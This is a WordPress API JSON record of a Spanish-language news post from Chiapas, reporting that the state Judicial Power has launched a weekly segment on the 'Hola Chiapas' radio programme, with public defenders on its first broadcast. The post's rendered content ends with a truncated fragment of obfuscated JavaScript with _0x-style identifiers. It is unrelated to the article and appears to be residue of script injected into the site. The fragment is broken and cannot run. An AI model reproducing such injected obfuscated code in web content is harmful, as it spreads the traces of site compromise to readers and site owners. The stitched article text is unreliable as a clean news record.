{"id":22464,"date":"2025-06-17T03:23:51","date_gmt":"2025-06-17T03:23:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22464"},"modified":"2025-06-17T03:23:52","modified_gmt":"2025-06-17T03:23:52","slug":"poder-judicial-estrena-espacio-en-el-programa-hola-chiapas-del-scrtyc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22464","title":{"rendered":"Poder Judicial estrena espacio en el programa \u201cHola Chiapas\u201d del SCRTyC"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"679\" data-id=\"22465\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173487-1024x679.jpg\" alt=\"\" class=\"wp-image-22465\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173487-1024x679.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173487-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173487-768x510.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173487-1536x1019.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173487-2048x1359.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173487-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"661\" data-id=\"22466\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173485-1024x661.jpg\" alt=\"\" class=\"wp-image-22466\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173485-1024x661.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173485-300x194.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173485-768x495.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173485-1536x991.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173485-2048x1321.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"644\" data-id=\"22467\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173483-1024x644.jpg\" alt=\"\" class=\"wp-image-22467\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173483-1024x644.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173483-300x189.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173483-768x483.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173483-1536x966.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000173483-2048x1288.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>16 de junio del 2025. Tuxtla Guti\u00e9rrez Con el compromiso de acercar la justicia a la ciudadan\u00eda, el Poder Judicial comenz\u00f3 una participaci\u00f3n activa dentro del programa radiof\u00f3nico \u201cHola Chiapas\u201d, del Sistema Chiapaneco de Radio, Televisi\u00f3n y Cinematograf\u00eda (SCRTyC).<\/p>\n\n\n\n<p>Cada viernes a las 11:00 horas, la y el locutor Mara Aguilar y Esteban Sol\u00f3rzano, junto a integrantes de esta familia judicial, platicar\u00e1n sobre los temas relevantes de la administraci\u00f3n de justicia, de los \u00f3rganos jurisdiccionales y responder\u00e1n dudas e inquietudes de las y los radioescuchas.<\/p>\n\n\n\n<p>En la primera emisi\u00f3n, se cont\u00f3 con la participaci\u00f3n del director del Instituto de la Defensor\u00eda P\u00fablica del Estado, Erik Ra\u00fal Z\u00e1rate L\u00f3pez, y el subdirector estatal de dicho Instituto, Antonio Cadenas Fonseca, quienes hablaron sobre la atenci\u00f3n ciudadana y los servicios que la defensor\u00eda ofrece; as\u00ed mismo, en este mes de junio, defensoras y defensores acudir\u00e1n a abundar sobre estos temas y responder las inquietudes de la audiencia.<\/p>\n\n\n\n<p>Con estas actividades, el Poder Judicial del Estado refuerza la comunicaci\u00f3n con la ciudadan\u00eda chiapaneca, a fin de cumplir con una justicia m\u00e1s humana, transparente y accesible.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 16 de junio del 2025. Tuxtla Guti\u00e9rrez Con el compromiso de acercar la justicia a la ciudadan\u00eda, el Poder Judicial comenz\u00f3 una participaci\u00f3n activa dentro del programa radiof\u00f3nico \u201cHola Chiapas\u201d, del Sistema Chiapaneco de Radio, Televisi\u00f3n y Cinematograf\u00eda (SCRTyC). Cada viernes a las 11:00 horas, la y el locutor Mara Aguilar y Esteban Sol\u00f3rzano, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22467,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22464","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22464","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22464"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22464\/revisions"}],"predecessor-version":[{"id":22468,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22464\/revisions\/22468"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22467"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22464"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22464"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22464"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}